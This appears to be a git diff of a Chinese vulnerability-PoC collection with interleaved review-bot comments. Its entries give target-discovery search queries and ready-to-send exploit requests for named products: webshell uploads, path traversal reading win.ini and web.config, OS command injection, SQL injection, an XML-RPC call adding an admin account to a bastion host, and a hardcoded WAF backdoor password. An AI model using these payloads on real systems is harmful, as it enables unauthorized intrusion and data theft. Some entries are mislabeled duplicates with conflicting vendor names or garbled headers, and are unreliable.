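Review bot: The 简介 of `契约锁utask存在远程命令执行漏洞.md` is identical to the edits and template files, so nothing in the text says this one is a different vector: Java source uploaded as `qys.jpg` with `type=TIMETASK` to `/login/%2E%2E;/utask/upload`, whose static initializer runs `ping grewuo.ceye.io`. State that, and state that the verification is the callback shown in the screenshots, not command output. The `ceye.io` domain is the author's own callback and should be marked as a placeholder, and the `%2E%2E;` form here differs from the `%2e%2e` form in the template file, which matters for anyone writing a path-normalisation or WAF rule.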
@@ -0,0 +1,36 @@ +# 奥威亚云视频平台UploadFile.aspx存在文件上传漏洞 + +奥威亚云视频平台UploadFile.aspx存在文件上传漏洞,攻击者可上传webshell获取服务器权限。 + +## fofa + +```yaml +body="/Upload/DomainInfo/MaxAVALogo.png" +``` + +## poc + +```java +POST /Services/WeikeCutOut/UploadFile.aspx?VideoGuid=/../../ HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5666.197 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Content-Type: multipart/form-data; boundary=----sajhdjqwjejqwbejhqwbjebqwhje + +------sajhdjqwjejqwbejhqwbjebqwhje +Content-Disposition: form-data; name="file"; filename="shell.aspx." +Content-Type: image/jpeg + +1111 +------sajhdjqwjejqwbejhqwbjebqwhje- +``` + +文件路径`http://ip/shell.aspx` + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/Kxmw41l8TK5jnaj63lyG0A \ No newline at end of file diff --git a/好视通云会议upLoad2.jsp接口处存在任意文件上传漏洞.md b/好视通云会议upLoad2.jsp接口处存在任意文件上传漏洞.md new file mode 100644 index 0000000..d948836 --- /dev/null +++ b/好视通云会议upLoad2.jsp接口处存在任意文件上传漏洞.md @@ -0,0 +1,27 @@ +# 好视通云会议upLoad2.jsp接口处存在任意文件上传漏洞 + +好视通云会议/fm/systemConfig/upLoad2.jsp接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过此漏洞上传恶意后门文件,最终可获取服务器权限。 + +## fofa + +```javascript +app:"好视通-云会议" +``` + +## poc + +```javascript +POST /fm/systemConfig/upLoad2.jsp HTTP/1.1 +Content-Type: multipart/form-data; boundary=1515df1sdfdsfddfs +Accept-Encoding: gzip + +--1515df1sdfdsfddfs +Content-Disposition: form-data; name="file"; filename="dudesuite.jsp" +Content-Type: application/octet-stream + +<% out.print("dudesuite"); %> +--1515df1sdfdsfddfs-- +``` + +文件路径`/fm/upload/dudesuite.jsp` + diff --git a/好视通视频会议系统-toDownload.do接口-任意文件读取漏洞.md b/好视通视频会议系统-toDownload.do接口-任意文件读取漏洞.md new file mode 100644 index 0000000..48027c3 --- /dev/null +++ b/好视通视频会议系统-toDownload.do接口-任意文件读取漏洞.md 
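Review bot: In `奥威亚云视频平台UploadFile.aspx存在文件上传漏洞.md` the fofa query is fenced with a `yaml` tag and the request with `java`; both are plain text. The write-up does not explain its two bypass components, the `VideoGuid=/../../` traversal in the query string and the trailing dot in `filename="shell.aspx."`, yet those are exactly what a fix must address (reject `..` in `VideoGuid`, normalise the filename before the extension check); add that as remediation. In `好视通云会议upLoad2.jsp接口处存在任意文件上传漏洞.md` the fofa query `app:"好视通-云会议"` uses `:` rather than FOFA's `=` operator, so it was probably copied from another search engine; verify it.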
@@ -0,0 +1,18 @@ +## 好视通视频会议系统 toDownload.do接口任意文件读取漏洞 +好视通 是国内云视频会议知名品牌,拥有多项创新核心技术优势、多方通信服务牌照及行业全面资质 ,专注为政府、公检法司、教育、集团企业等用户提供“云+端+业务全场景”解决方案。其视频会议系统的路径(fastmeeting) /register/toDownload.do?fileName= 存在任意文件遍历漏洞,可通过fileName参数读取任意文件。 + +弱口令admin/admin + +## fofa +``` +"深圳银澎云计算有限公司" +``` + +## poc +``` +/register/toDownload.do?fileName=敏感文件路径 +https://xxxxxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini + +``` + + diff --git a/好视通视频会议系统存在任意文件读取漏洞.md b/好视通视频会议系统存在任意文件读取漏洞.md new file mode 100644 index 0000000..719ac5b --- /dev/null +++ b/好视通视频会议系统存在任意文件读取漏洞.md @@ -0,0 +1,26 @@ +# 好视通视频会议系统存在任意文件读取漏洞 + +# 一、漏洞简介 +<font style="color:rgb(51, 51, 51);">好视通视频会议是由深圳市华视瑞通信息技术有限公司开发,其在国内率先推出了3G互联网视频会议,并成功应用于SAAS领域。好视通视频会议系统存在任意文件读取漏洞,攻击者可通过该漏洞获取敏感信息。</font> + +# <font style="color:rgb(51, 51, 51);">二、影响版本</font> ++ 好视通视频会议系统 + +# 三、资产测绘 ++ hunter`app.name="好视通 Server Management System"` ++ 特征![1700702275984-2d23da89-0111-4006-a5ce-874a3a2d9fd8.png](./img/SGtAAjB6Vw--6aV5/1700702275984-2d23da89-0111-4006-a5ce-874a3a2d9fd8-049119.png) + +# 四、漏洞复现 +```python +GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Length: 0 +``` + +![1700702314990-271b30ee-3c76-46b3-8671-216dcfaf4416.png](./img/SGtAAjB6Vw--6aV5/1700702314990-271b30ee-3c76-46b3-8671-216dcfaf4416-185423.png) + + + +> 更新: 2024-02-29 23:55:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gsb2m9xvhebci1ix> \ No newline at end of file diff --git a/威努特sslvpn_client存在远程命令执行漏洞.md b/威努特sslvpn_client存在远程命令执行漏洞.md new file mode 100644 index 0000000..5cef73a --- /dev/null +++ b/威努特sslvpn_client存在远程命令执行漏洞.md 
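Review bot: these two files document the same endpoint and the identical payload (`/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini`) but attribute the product to two different vendors (深圳银澎云计算有限公司 in the first, 深圳市华视瑞通信息技术有限公司 in the second); merge them and keep one attribution, or say which is correct. The first file drops `弱口令admin/admin` in with no indication of where that default credential applies. The second file wraps headings and prose in `<font style="color:rgb(51, 51, 51);">` tags from the Yuque export and tags a raw HTTP request as `python`; both should be stripped.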
@@ -0,0 +1,44 @@ +# 威努特sslvpn_client存在远程命令执行漏洞 + +# 一、漏洞简介 +威努特防火墙sslvpn_client存在远程命令执行漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 威努特第二代防火墙 ++ 威努特上网行为管理系统 + +# 三、资产测绘 ++ hunter`app.name=="威努特第二代防火墙"` ++ 特征 + +![1701763255220-b1f2801a-99cf-4b00-908a-e0407077d750.png](./img/r7gYetii6UGZxE7M/1701763255220-b1f2801a-99cf-4b00-908a-e0407077d750-805088.png) + +![1701763267244-47dfc2c5-8543-4eba-81fc-85757181229a.png](./img/r7gYetii6UGZxE7M/1701763267244-47dfc2c5-8543-4eba-81fc-85757181229a-036372.png) + +# 四、漏洞复现 +```java +GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e.png](./img/r7gYetii6UGZxE7M/1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e-569947.png) + +获取命令执行结果 + +```java +GET /sslvpn/ceshi.txt HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1701762342384-224cbced-19ed-428d-b26d-9957865251d2.png](./img/r7gYetii6UGZxE7M/1701762342384-224cbced-19ed-428d-b26d-9957865251d2-186116.png) + + + +> 更新: 2024-02-29 23:57:12 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qg31v0mn53x3w50g> \ No newline at end of file diff --git a/孚盟云AjaxMethod.ashxSQL注入漏洞.md b/孚盟云AjaxMethod.ashxSQL注入漏洞.md new file mode 100644 index 0000000..2e37259 --- /dev/null +++ b/孚盟云AjaxMethod.ashxSQL注入漏洞.md 
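Review bot: the payload writes command output to `/usr/local/webui/sslvpn/ceshi.txt` and nothing in the entry removes it, so every test leaves a world-readable artifact in the appliance's web root; add a cleanup step. The same request string, the same `ceshi.txt` path and the same screenshot files (`1701762310844-e2bb6845-...png`, `1701762342384-224cbced-...png`) reappear in the 安盟华御 entry further down, so these screenshots cannot serve as evidence for both products; cross-reference rather than copy.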
@@ -0,0 +1,27 @@ +# 孚盟云AjaxMethod.ashx SQL注入漏洞 + +# 一、漏洞简介 +孚盟与阿里强强联手将最受青睐的经典C系列产品打造成全新的孚盟云产品,让用户可以用云模式实现信息化管理,让用户的异地办公更加流畅,大大降低中小企业在信息化上成本,用最小的投入享受大型企业级别的信息化服务,使中小企业在网络硬件环境、内部贸易过程管理与快速通关形成一套完整解决方案。 + +# 二、影响版本 ++ 孚盟云CRM + +# 三、资产测绘 ++ hunter`app.name="孚盟云 CRM"` ++ 登录页面 + +![1693927610010-b856fdb9-d5da-4a65-b0c3-197c665b1d44.png](./img/3TX-gi-rq43CrYKh/1693927610010-b856fdb9-d5da-4a65-b0c3-197c665b1d44-038131.png) + +# 四、漏洞复现 +```plain +/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=1 +``` + +![1693927659635-ea1af5b1-5f90-4a5f-b9d9-98420438bc7e.png](./img/3TX-gi-rq43CrYKh/1693927659635-ea1af5b1-5f90-4a5f-b9d9-98420438bc7e-610567.png) + +![1693928003514-3c2d3a36-6df6-45a5-972e-13703a75416f.png](./img/3TX-gi-rq43CrYKh/1693928003514-3c2d3a36-6df6-45a5-972e-13703a75416f-294343.png) + + + +> 更新: 2024-02-29 23:55:47 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xubb5blcky307d56> \ No newline at end of file diff --git a/孚盟云系统接口MailAjax.ashx存在SQL注入漏洞.md b/孚盟云系统接口MailAjax.ashx存在SQL注入漏洞.md new file mode 100644 index 0000000..2692364 --- /dev/null +++ b/孚盟云系统接口MailAjax.ashx存在SQL注入漏洞.md 
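Review bot: the only request shown, `/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=1`, carries no injection payload, so 漏洞复现 does not actually demonstrate SQL injection and a reader cannot tell what the two screenshots prove. Add the probe that was used on `Name` (time-based or error-based) or the sqlmap invocation, and replace the 漏洞简介 marketing paragraph with one sentence naming the injectable parameter and the backend.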
@@ -0,0 +1,25 @@ +# 孚盟云系统接口MailAjax.ashx存在SQL注入漏洞 + +孚盟云系统接口MailAjax.ashx存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```javascript +app="孚盟软件-孚盟云" +``` + +## poc + +```javascript +POST /Ajax/MailAjax.ashx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: UserCookie={"LicNo":"","lastLoginIp":"","LicSelected":"cloud","ProductID":"M8","loginUser":"00210","userToken":"A39418D1C5EADEFD41E99B71976A531E24EC2C6B9E7D4CD460A406769A97CC9DE2966975679C521F499A8F215B51B65C4D067F57D94D260B6EF4C16094D56562"} +Connection: close +Content-Type: application/x-www-form-urlencoded + +action=GetMailContactsCard&custFID=%28SELECT%20CHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28CASE%20WHEN%20%287588%3D7588%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28106%29%2BCHAR%28107%29%2BCHAR%28113%29%29 +``` + diff --git a/孚盟云系统接口ajaxsenddingdingmessage存在SQL注入漏洞.md b/孚盟云系统接口ajaxsenddingdingmessage存在SQL注入漏洞.md new file mode 100644 index 0000000..5a6ca13 --- /dev/null +++ b/孚盟云系统接口ajaxsenddingdingmessage存在SQL注入漏洞.md 
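Review bot: the request carries a complete `Cookie: UserCookie={...,"loginUser":"00210","userToken":"A39418D1C5EA..."}` captured from one instance; either the endpoint requires an authenticated session, in which case the page must say so (the bug is then post-auth) and explain how to obtain one, or the cookie is irrelevant and should be removed so readers do not assume that exact token is needed. The `custFID` payload concatenates `CHAR()` values into the marker `qkvzq` + `1` + `qzjkq`, so stating that a vulnerable response contains `qkvzq1qzjkq` would give a concrete success check, and the `CHAR()` syntax implies MSSQL, which is worth noting.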
@@ -0,0 +1,25 @@ +# 孚盟云系统接口ajaxsenddingdingmessage存在SQL注入漏洞 + +孚盟云系统接口ajaxsenddingdingmessage存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```javascript +body="hidLicResult" && body="hidProductID" +``` + +## poc + +```javascript +POST /m/Dingding/Ajax/AjaxSendDingdingMessage.ashx HTTP/1.1 +Host: +Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15X-Requested-With: XMLHttpRequest +Content-Length: 51 + +action=SendDingMeg_Mail&empId=2'+and+1=@@VERSION--+ +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409272016507.jpeg) \ No newline at end of file diff --git a/安徽生命港湾信息技术有限公司服务配置工具存在任意文件下载漏洞.md b/安徽生命港湾信息技术有限公司服务配置工具存在任意文件下载漏洞.md new file mode 100644 index 0000000..53ac8a0 --- /dev/null +++ b/安徽生命港湾信息技术有限公司服务配置工具存在任意文件下载漏洞.md 
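Review bot: two pairs of header lines in the poc block have been run together: `Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9` and `...Safari/605.1.15X-Requested-With: XMLHttpRequest`; pasted as-is, the request sends an invalid `Accept-Encoding` value and no `X-Requested-With` header at all. Split them onto separate lines. The payload `empId=2'+and+1=@@VERSION--+` works by forcing an integer-to-string conversion error that echoes `@@VERSION` back, which points at MSSQL; one sentence saying so would tell readers what the error text in the screenshot means.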
@@ -0,0 +1,33 @@ +# 安徽生命港湾信息技术有限公司服务配置工具存在任意文件下载漏洞 + +# 一、漏洞简介 +安徽生命港湾信息技术有限公司,成立于2020年7月。以“产品+解决方案+服务”引领技术、运营模式创新,是以楼宇自控产品(BA)、软件平台(IBMS)、数字建筑、物联网系统(AIoT)为核心技术驱动的创新型技术企业,致力于智慧建筑、物联网系统产品研发、制造,产品涵盖IBMS平台软件、边缘计算网关、物联网数据中台、楼宇自控设备、执行器、传感器等。凭借技术团队多年的行业耕耘及深入场景的产品设计和创新,以IBMS为可视化运维管理平台,将物联网数据采集、大数据与IBMS融合,实现安防、医疗、楼宇自控、能源、园区、环境、城市、应急等智慧控制管理功能,为医院、园区、教育、政务、轨道交通等行业提供智慧建筑全生态解决方案。安徽生命港湾信息技术有限公司服务配置工具存在任意文件下载漏洞 + +# 二、影响版本 ++ 服务配置工具 + +# 三、资产测绘 ++ fofa:`body="css/markdown.css" && body="icon-512.png"` ++ 特征 + +![1733591983248-8301dd73-b583-47cd-aacc-864c5214c282.png](./img/PNMBjNOeHcnDPE9f/1733591983248-8301dd73-b583-47cd-aacc-864c5214c282-414402.png) + +# 四、漏洞复现 +```java +GET /api/File/Download?file=../web.config HTTP/1.1 +Host: +Priority: u=0, i +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 + +``` + +![1733592027293-51775f39-1fc6-48dc-8b13-194bf5dba413.png](./img/PNMBjNOeHcnDPE9f/1733592027293-51775f39-1fc6-48dc-8b13-194bf5dba413-711997.png) + + + +> 更新: 2024-12-20 14:53:54 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zd3swwh4v3saweol> \ No newline at end of file diff --git a/安恒下一代防火墙存在命令执行漏洞.md b/安恒下一代防火墙存在命令执行漏洞.md new file mode 100644 index 0000000..618895b --- /dev/null +++ b/安恒下一代防火墙存在命令执行漏洞.md 
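Review bot: the 漏洞简介 paragraph is company marketing up to its final clause, which names the vulnerability but not the endpoint; move `/api/File/Download?file=../web.config` and its impact into the summary (for an ASP.NET application `web.config` commonly holds connection strings and machine keys). The PoC uses a single `../`, so say whether deeper traversal is needed for files outside the web root and whether the endpoint needs authentication; the 影响版本 entry `服务配置工具` also carries no version.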
@@ -0,0 +1,117 @@ +# 安恒下一代防火墙存在命令执行漏洞 + +# 一、漏洞简介 +安恒明御运维审计与风险控制系统(简称“DASUSM”)是一款基于运维安全管理的理论和实践经验,结合各类法律法规(如等级保护、赛班斯法案SOX、PCI、企业内控管理、分级保护、ISO/IEC 27001等)对运维审计的要求,采用B/S架构,集“身份认证(Authentication)、账户管理(Account)、控制权限(Authorization)、日志审计(Audit)”于一体,支持多种字符终端协议、文件传输协议、图形终端协议、远程应用协议的安全监控与历史查询,具备全方位运维风险控制能力的统一安全管理与审计产品。安恒明御运维审计风险控制系统(堡垒机)存在任意用户添加漏洞,攻击者可利用该漏洞添加用户登录堡垒机。 + +# 二、影响版本 ++ 安恒明御运维审计与风险控制系统 + +# 三、资产测绘 ++ hunter:`app.name=="安恒明御运维审计与风险控制系统"` + +![1691393320775-2fcf53cd-f670-4d22-a04e-ae7f76d4cb44.png](./img/_Zxcf_M89e3_ahWJ/1691393320775-2fcf53cd-f670-4d22-a04e-ae7f76d4cb44-982106.png) + ++ 首页 + +![1691393366555-3c70041c-447d-415f-a6e6-bd852a153318.png](./img/_Zxcf_M89e3_ahWJ/1691393366555-3c70041c-447d-415f-a6e6-bd852a153318-123751.png) + +# 四、漏洞复现 +使用exp添加用户`qaxnb666/Admin123..` + +```java +POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1 +Host: xx.xx.xx.xx +Content-Length: 1112 + +<?xml version="1.0"?> +<methodCall> +<methodName>web.user_add</methodName> +<params> +<param> +<value> +<array> +<data> +<value> +<string>admin</string> +</value> +<value> +<string>5</string> +</value> +<value> +<string>10.17.1.1</string> +</value> +</data> +</array> +</value> +</param> +<param> +<value> +<struct> +<member> +<name>uname</name> +<value> +<string>qaxnb666</string> +</value> +</member> +<member> +<name>name</name> +<value> +<string>yuwe</string> +</value> +</member> +<member> +<name>pwd</name> +<value> +<string>Admin123..</string> +</value> +</member> +<member> +<name>authmode</name> +<value> +<string>1</string> +</value> +</member> +<member> +<name>deptid</name> +<value> +<string></string> +</value> +</member> +<member> +<name>email</name> +<value> +<string></string> +</value> +</member> +<member> +<name>mobile</name> +<value> +<string></string> +</value> +</member> +<member> +<name>comment</name> +<value> +<string></string> +</value> +</member> +<member> +<name>roleid</name> +<value> +<string>101</string> +</value> +</member> 
+</struct></value> +</param> +</params> +</methodCall> +``` + +![1691393678758-f523c4a1-eb67-42fb-ae42-b3bb5c838378.png](./img/_Zxcf_M89e3_ahWJ/1691393678758-f523c4a1-eb67-42fb-ae42-b3bb5c838378-918576.png) + +![1691393729985-1a6856f8-5697-483e-a696-b7f1f69a28e9.png](./img/_Zxcf_M89e3_ahWJ/1691393729985-1a6856f8-5697-483e-a696-b7f1f69a28e9-919588.png) + + + +> 更新: 2024-07-17 17:36:22 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/no2fqia6mfaidmur> \ No newline at end of file diff --git a/安恒堡垒机任意用户添加漏洞.md b/安恒堡垒机任意用户添加漏洞.md new file mode 100644 index 0000000..7df69ad --- /dev/null +++ b/安恒堡垒机任意用户添加漏洞.md 
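Review bot: the file is titled `安恒下一代防火墙存在命令执行漏洞`, but the entire body, from the DASUSM bastion-host description through the `web.user_add` XML-RPC call that creates `qaxnb666/Admin123..`, is the 堡垒机 arbitrary-user-add entry that appears verbatim in the next file (`安恒堡垒机任意用户添加漏洞.md`, same screenshots). Nothing here concerns a next-generation firewall or command execution. Either replace the body with the NGFW PoC the title promises or drop the file; as submitted it is a mislabeled duplicate.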
@@ -0,0 +1,117 @@ +# 安恒堡垒机任意用户添加漏洞 + +# 一、漏洞简介 +安恒明御运维审计与风险控制系统(简称“DASUSM”)是一款基于运维安全管理的理论和实践经验,结合各类法律法规(如等级保护、赛班斯法案SOX、PCI、企业内控管理、分级保护、ISO/IEC 27001等)对运维审计的要求,采用B/S架构,集“身份认证(Authentication)、账户管理(Account)、控制权限(Authorization)、日志审计(Audit)”于一体,支持多种字符终端协议、文件传输协议、图形终端协议、远程应用协议的安全监控与历史查询,具备全方位运维风险控制能力的统一安全管理与审计产品。安恒明御运维审计风险控制系统(堡垒机)存在任意用户添加漏洞,攻击者可利用该漏洞添加用户登录堡垒机。 + +# 二、影响版本 ++ 安恒明御运维审计与风险控制系统 + +# 三、资产测绘 ++ hunter:`app.name=="安恒明御运维审计与风险控制系统"` + +![1691393320775-2fcf53cd-f670-4d22-a04e-ae7f76d4cb44.png](./img/cmq6DHY7F_D9I14C/1691393320775-2fcf53cd-f670-4d22-a04e-ae7f76d4cb44-574865.png) + ++ 首页 + +![1691393366555-3c70041c-447d-415f-a6e6-bd852a153318.png](./img/cmq6DHY7F_D9I14C/1691393366555-3c70041c-447d-415f-a6e6-bd852a153318-116673.png) + +# 四、漏洞复现 +使用exp添加用户`qaxnb666/Admin123..` + +```java +POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1 +Host: xx.xx.xx.xx +Content-Length: 1112 + +<?xml version="1.0"?> +<methodCall> +<methodName>web.user_add</methodName> +<params> +<param> +<value> +<array> +<data> +<value> +<string>admin</string> +</value> +<value> +<string>5</string> +</value> +<value> +<string>10.17.1.1</string> +</value> +</data> +</array> +</value> +</param> +<param> +<value> +<struct> +<member> +<name>uname</name> +<value> +<string>qaxnb666</string> +</value> +</member> +<member> +<name>name</name> +<value> +<string>yuwe</string> +</value> +</member> +<member> +<name>pwd</name> +<value> +<string>Admin123..</string> +</value> +</member> +<member> +<name>authmode</name> +<value> +<string>1</string> +</value> +</member> +<member> +<name>deptid</name> +<value> +<string></string> +</value> +</member> +<member> +<name>email</name> +<value> +<string></string> +</value> +</member> +<member> +<name>mobile</name> +<value> +<string></string> +</value> +</member> +<member> +<name>comment</name> +<value> +<string></string> +</value> +</member> +<member> +<name>roleid</name> +<value> +<string>101</string> +</value> +</member> 
+</struct></value> +</param> +</params> +</methodCall> +``` + +![1691393678758-f523c4a1-eb67-42fb-ae42-b3bb5c838378.png](./img/cmq6DHY7F_D9I14C/1691393678758-f523c4a1-eb67-42fb-ae42-b3bb5c838378-529529.png) + +![1691393729985-1a6856f8-5697-483e-a696-b7f1f69a28e9.png](./img/cmq6DHY7F_D9I14C/1691393729985-1a6856f8-5697-483e-a696-b7f1f69a28e9-029750.png) + + + +> 更新: 2024-02-29 23:57:16 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uw8xn0gy2yh82z2w> \ No newline at end of file diff --git a/安恒明御Web应用防火墙任意登录漏洞.md b/安恒明御Web应用防火墙任意登录漏洞.md new file mode 100644 index 0000000..27c19d1 --- /dev/null +++ b/安恒明御Web应用防火墙任意登录漏洞.md 
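Review bot: the exp creates a persistent account (`uname` `qaxnb666`, `pwd` `Admin123..`, `roleid` `101`) through `web.user_add` over `unix:/../../../../var/run/rpc/xmlrpc.sock`, yet no removal step is documented, so a real test leaves a privileged login on the bastion host; add a cleanup or at least a warning. The fixed `Content-Length: 1112` becomes wrong the moment anyone changes the username, password or the `10.17.1.1` value in the first parameter, so note that it must be recomputed, and the fence is tagged `java` for an XML-RPC request.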
@@ -0,0 +1,54 @@ +# 安恒明御Web应用防火墙任意登录漏洞 + +# 一、漏洞简介 +<font style="color:rgb(36, 41, 46);">安恒 明御WEB应用防火墙 report.php文件存在硬编码设置的Console用户登录</font> + +# <font style="color:rgb(36, 41, 46);">二、影响版本</font> ++ <font style="color:rgb(36, 41, 46);">明御 WAF X86 架构 <= 4.6.33</font> ++ <font style="color:rgb(36, 41, 46);">明御 WAF 信创兆芯 = 4.5</font> ++ <font style="color:rgb(36, 41, 46);">明御 WAF 鲲鹏 = 4.6.18</font> + +# <font style="color:rgb(36, 41, 46);">三、资产测绘</font> ++ hunter:`app.name="安恒明御 WEB应用防火墙"` + +![1691870207684-43773e1e-380f-4b50-97c4-970a85fe15da.png](./img/2T7HQw4oHIy0OLXx/1691870207684-43773e1e-380f-4b50-97c4-970a85fe15da-510345.png) + ++ 登录页面 + +![1691870225669-83195d88-a32e-4040-9f1c-2a56c683bc0b.png](./img/2T7HQw4oHIy0OLXx/1691870225669-83195d88-a32e-4040-9f1c-2a56c683bc0b-657075.png) + +![1691870232014-cbeb65c6-e392-4ec9-9a10-a412bb88d806.png](./img/2T7HQw4oHIy0OLXx/1691870232014-cbeb65c6-e392-4ec9-9a10-a412bb88d806-158115.png) + +# 四、漏洞复现 +1. 访问poc + +```plain +/report.m?a=rpc-timed +``` + +![1691870301946-d3891e18-1a97-42d1-b267-b33469f8346c.png](./img/2T7HQw4oHIy0OLXx/1691870301946-d3891e18-1a97-42d1-b267-b33469f8346c-880725.png) + +2. <font style="color:rgb(36, 41, 46);">接着删除路径信息,再次访问登录界面就会出现这个界面</font> + +![1691870377480-392d2c1d-9a61-49de-9dd7-4238ddede8d1.png](./img/2T7HQw4oHIy0OLXx/1691870377480-392d2c1d-9a61-49de-9dd7-4238ddede8d1-426367.png)![1691870410076-6ce9b3d6-93a4-4520-9df6-de8c21438976.png](./img/2T7HQw4oHIy0OLXx/1691870410076-6ce9b3d6-93a4-4520-9df6-de8c21438976-170796.png) + +3. 访问下面这个路径,进入系统设置(不能直接点系统设置),就可以更改SSH的配置了。 + +```plain +/system.m?a=reserved +``` + +![1691870717826-fb965fdd-ec4c-411d-a116-5e9935289e2b.png](./img/2T7HQw4oHIy0OLXx/1691870717826-fb965fdd-ec4c-411d-a116-5e9935289e2b-731935.png) + +4. 在密码框中,输入密码,就可以更改SSH配置,也可查看其他菜单 + +```plain +!@#dbapp-waf-dev-reserved#@! 
+``` + +![1691870792270-ff4dc9a2-cce2-4788-9c6a-e704841c90fa.png](./img/2T7HQw4oHIy0OLXx/1691870792270-ff4dc9a2-cce2-4788-9c6a-e704841c90fa-715844.png) + + + +> 更新: 2024-02-29 23:57:16 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fg8ocgvc7bpywni4> \ No newline at end of file diff --git a/安恒明御安全网关aaa_local_web_preview存在远程命令执行漏洞.md b/安恒明御安全网关aaa_local_web_preview存在远程命令执行漏洞.md new file mode 100644 index 0000000..66b3102 --- /dev/null +++ b/安恒明御安全网关aaa_local_web_preview存在远程命令执行漏洞.md 
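Review bot: the 漏洞简介 says the hardcoded Console login lives in `report.php`, but step 1 of 漏洞复现 requests `/report.m?a=rpc-timed`; one of the two is wrong and the summary should match the PoC. Step 2 (`接着删除路径信息,再次访问登录界面`) is vague: say explicitly that the reader drops the `/report.m?a=rpc-timed` part of the URL and reloads the login page, and whether the same browser session must be kept. The `<font style="color:rgb(36, 41, 46);">` wrappers from the Yuque export should be stripped from the headings and list items.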
@@ -0,0 +1,41 @@ +# 安恒明御安全网关aaa_local_web_preview存在远程命令执行漏洞 + +# 一、漏洞简介 +安恒信息明御安全网关<font style="color:rgb(0, 0, 0);">(以下简称“NGFW”)秉持安全可视、简单有效的理念,以资产为视角,构建“事前+事中+事后”全流程防御的下一代安全防护体系,并融合传统防火墙、</font>入侵防御系统<font style="color:rgb(0, 0, 0);">、防病毒网关、上网行为管控、VPN网关、威胁情报等</font>安全模块<font style="color:rgb(0, 0, 0);">于一体的智慧化安全网关。安恒明御安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞。攻击者可通过该漏洞获取服务器权限。</font> + +# <font style="color:rgb(0, 0, 0);">二、影响版本</font> ++ 安恒明御安全网关 + +# 三、资产测绘 ++ hunter`app.name="安恒明御安全网关"` ++ 特征 + +![1699939786628-0b13cd03-210c-4d73-9fb2-6198942e15c3.png](./img/jAKWW4JqUQbjCmHl/1699939786628-0b13cd03-210c-4d73-9fb2-6198942e15c3-523650.png) + +# 四、漏洞复现 +```plain +GET /webui/?g=aaa_portal_auth_wchat_submit&suffix=;echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/stc.txt|ls HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: {hostname} +Accept: text/html, 